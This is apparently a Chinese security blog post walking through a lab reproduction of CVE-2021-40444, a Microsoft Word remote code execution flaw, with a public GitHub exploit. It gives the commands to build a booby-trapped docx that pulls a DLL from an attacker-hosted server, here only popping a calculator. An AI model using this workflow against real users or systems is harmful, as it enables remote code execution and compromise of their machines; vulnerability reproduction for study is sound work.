CVE-2021-40444(Microsoft Office Word 远程执行代码)弹计算器复现过程中的问题

0757

github项目地址:https://github.com/lockedbyte/CVE-2021-40444

环境准备

系统版本

d2b5ca33bd052422

ie版本

d2b5ca33bd052435

插件设置

d2b5ca33bd052516

d2b5ca33bd052529

d2b5ca33bd052553

word版本

d2b5ca33bd052606

d2b5ca33bd052615

开始复现

在服务器 git clone https://github.com/lockedbyte/CVE-2021-40444.git

然后安装 apt-get install lcab

还要安装 unzip

首先生成一个给定 DLL 的恶意 docx 文档,使用test/calc.dll弹出的文档calc.exesystem()

d2b5ca33bd052638

python3 exploit.py generate test/calc.dll http://服务器IP

d2b5ca33bd052653

把/out目录下生成的document.docx文档下载到虚拟机上

服务器开启监听python3 exploit.py host 80

在虚拟机中打开文件

d2b5ca33bd052707

服务器端收到请求

d2b5ca33bd052717

 
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
漏洞复现
喜欢就支持一下吧
点赞7 分享
Tess的头像-tess-wiki
HTB靶机:Bastard-tess-wiki
HTB靶机:Bastard
HTB靶机:Bastard
2年前 291
使用Gost搭建一个快速简单的Socks5代理通道-tess-wiki
使用Gost搭建一个快速简单的Socks5代理通道
使用Gost搭建一个快速简单的Socks5代理通道
2年前 236
CISP-PTS-第一天-上午-tess-wiki
CISP-PTS-第一天-上午
CISP-PTS-第一天-上午
2年前 211
kali安装蚁剑AntSword和运行-tess-wiki
kali安装蚁剑AntSword和运行
kali安装蚁剑AntSword和运行
2年前 175
PWN入门-tess-wiki
PWN入门
PWN入门
2年前 153
Python 连接mysql脚本-tess-wiki
Python 连接mysql脚本
Python 连接mysql脚本
1年前 150
相关推荐
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称

请填写用户信息:

  • 昵称(必填)
  • 邮箱(必填)

    暂无评论内容